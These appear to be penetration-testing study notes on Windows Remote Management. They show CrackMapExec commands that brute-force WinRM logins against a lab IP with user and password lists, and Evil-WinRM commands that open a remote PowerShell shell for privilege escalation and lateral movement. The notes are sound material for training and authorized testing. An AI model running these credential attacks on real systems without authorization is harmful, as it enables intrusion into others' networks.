WinRM [5985, 5986]

WinRM is Microsoft’s implementation of the Web Services-Management Protocol (WS-Management).

• Based on SOAP and XML Web Services

• Enables remote administration of Windows systems

• Interfaces with WMI, WBEM, and optionally DCOM

---

🔐 Security & Configuration

• Not enabled by default on Windows 10

• Must be manually activated and configured

• Heavily reliant on domain/local environment security

Port	Protocol
5985	HTTP
5986	HTTPS (secured via certificates)

🔐 Best practice: Use certificates or secure authentication mechanisms

---

Tools for WinRM Exploitation

CrackMapExec (CME)

A versatile post-exploitation tool often called the Swiss Army Knife for Pentesters 🗡️

Supports: SMB, LDAP, MSSQL, SSH, and WinRM

🔧 Installation

sudo apt-get -y install crackmapexec
# or
sudo apt-get -y install netexec  # Community rebrand/fork

---

🔍 Example with WinRM:

crackmapexec winrm 10.129.42.197 -u user.list -p password.list

✔️ Success Output Example:

WINRM  10.129.42.197  5985  NONE [+] None\user:password (Pwn3d!)

🟢 Pwn3d! indicates successful login and likely command execution capability.

---

📚 CME Help Options

• General Help:

crackmapexec -h

• Protocol-specific Help:

crackmapexec smb -h
crackmapexec winrm -h

Great for discovering additional modules like enumeration, file access, or lateral movement scripts.

---

Login with Evil-WinRM

An essential tool designed specifically for communicating with WinRM endpoints 🪟🔐

🔧 Installation

sudo gem install evil-winrm

💻 Basic Usage

evil-winrm -i <target-IP> -u <username> -p <password>

🔍 Example:

evil-winrm -i 10.129.42.197 -u user -p password

✅ On success, a PowerShell Remoting Protocol shell is launched:

*Evil-WinRM* PS C:\Users\user\Documents>

🎯 Use this session to enumerate, download/upload files, escalate privileges, and move laterally within the network.

---